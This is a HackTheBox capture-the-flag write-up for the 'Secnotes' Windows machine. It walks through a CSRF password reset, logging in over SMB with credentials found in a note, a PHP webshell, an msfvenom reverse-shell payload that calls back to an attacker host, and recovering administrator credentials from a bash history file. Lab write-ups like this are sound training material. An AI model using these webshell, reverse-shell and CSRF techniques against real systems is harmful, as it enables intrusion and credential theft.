Secnotes
A medium Windows box from HackTheBox, get initial access by resetting the password of another user on a site with CSRF, then get creds by logging in as them that allow you to get a reverse shell and escalate to administrator by finding creds in an instance of bash for windows.
Recon
Starting with a default nmap scan
sudo nmap -sC -sV -Pn nmap/init 10.10.10.97
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-25T16:50:24
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-09-25T09:50:27-07:00
|_clock-skew: mean: 2h20m02s, deviation: 4h02m31s, median: 1s
Only two ports open so navigate to the site
See a login page, dont get any easy SQLi payloads work, so create an account and log in
It seems to be a note taking app
Get a user and domain with user “tyler” and domain “secnotes.htb”, so add that domain to the /etc/hosts file
Now try playing around with the site to see what we can find, and find a XXS when you create a note, but it doesn’t really seem useful since theres no way to make someone navigate to it
The focus on the contact form in the header makes me think that it could be a CSRF vulnerability, and try to test it out on the site with a simple payload of
http://10.10.14.9/
Start a netcat listener on port 80 and send the payload to see if it will pop
And it does
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.97] 56002
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.9
Connection: Keep-Alive
Exploitation
Now need to do something malicious with this knowledge, maybe we can reset the “tyler” users password?
Notice that the reset password functionality doesn’t require the current password
So its a prime target
Catching the request in burp, see that its a post request - try to check if it can still be changed if its sent as a get request for simplicity
If it can only be sent as a post we’ll have to include some javascript to submit the form
To convert the request, send the captured password change request to repeater, then right click and select “Change HTTP method”, and burp will convert the POST request to GET
Sending the new GET request, it still resets the password
In the end, the URL for the password reset request is
http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
And send it in the contact form
Wait a minute or two, then try to login as tyler with password “password” and get in to read his notes
The note on the bottom contains what looks like SMB creds, so go to connect to that with smbclient
tyler:92g!mA8BGjOirkL%OG*&
smbclient \\\\secnotes.htb\\new-site --user=tyler
Then login with the password - but dont see anything too interesting, just the default contents of an IIS site
smb: \> ls
. D 0 Sun Sep 25 14:50:33 2022
.. D 0 Sun Sep 25 14:50:33 2022
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018
test.html A 74 Sun Sep 25 14:50:33 2022
7736063 blocks of size 4096. 3332421 blocks available
smb: \>
Trying to navigate on the secnotes site to /iistart.htm dont see anything, so maybe we are missing something
sudo nmap -p- -T4 -v secnotes.htb
Find another open port, 8808
...
Discovered open port 8808/tcp on 10.10.10.97
...
Navigating to it in the browser, see an IIS homepage - to test if its the same one that we have in SMB upload a test.txt file to the SMB server with the contents “test”, then navigate to it at
http://10.10.10.97:8808/test.txt
And see it displayed on the site
Now to see if we can get an ASP webshell going, but neither ASP nor ASPX work
Intead try a PHP webshell since maybe its the same configuration as the secnotes.htb site
<?php system($_GET['cmd']); ?>
Upload it as web.php, and try the url
http://10.10.10.97:8808/rev.php?cmd=whoami
And see in the source
So know we have code execution and can simply upload an exe reverse shell and execute it with the webshell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=9001 -f exe > rev.exe
Start a listener on 9001, and upload the rev.exe file using the put command on the SMB server
Then navigate to
http://10.10.10.97:8808/webshell.php?cmd=rev.exe
And catch the reverse shell as tyler
C:\inetpub\new-site>whoami
secnotes\tyler
C:\inetpub\new-site>
In tylers desktop while submitting the user.txt file, also find a bash.lnk file, a desktop shortcute to bash?
Directory of C:\Users\tyler\Desktop
09/25/2022 12:50 PM <DIR> .
09/25/2022 12:50 PM <DIR> ..
06/22/2018 03:09 AM 1,293 bash.lnk
08/02/2021 03:32 AM 1,210 Command Prompt.lnk
04/11/2018 04:34 PM 407 File Explorer.lnk
09/25/2022 12:50 PM <DIR> Microsoft
06/21/2018 05:50 PM 1,417 Microsoft Edge.lnk
06/21/2018 09:17 AM 1,110 Notepad++.lnk
09/25/2022 09:33 AM 34 user.txt
08/19/2018 10:59 AM 2,494 Windows PowerShell.lnk
7 File(s) 7,965 bytes
3 Dir(s) 13,628,198,912 bytes free
Seems like he installed bash for windows, trying to execute it with
bash
The file isn’t found, so have to go looking for it with
C:\Users\tyler\Desktop>where /R c:\ bash.exe
where /R c:\ bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
Execute it with
C:\Users\tyler\Desktop> c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
And drop into a bash shell
whoami
root
However when we try to access the C:\Users\Administrator folder, dont have read access
Instead, poke around the bash environment, and find a .bash_history file
cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
And see some administrator creds!
Back on the Kali machine, try to connect using the creds found in the file, and get a connection as the Administrator user to extract root.txt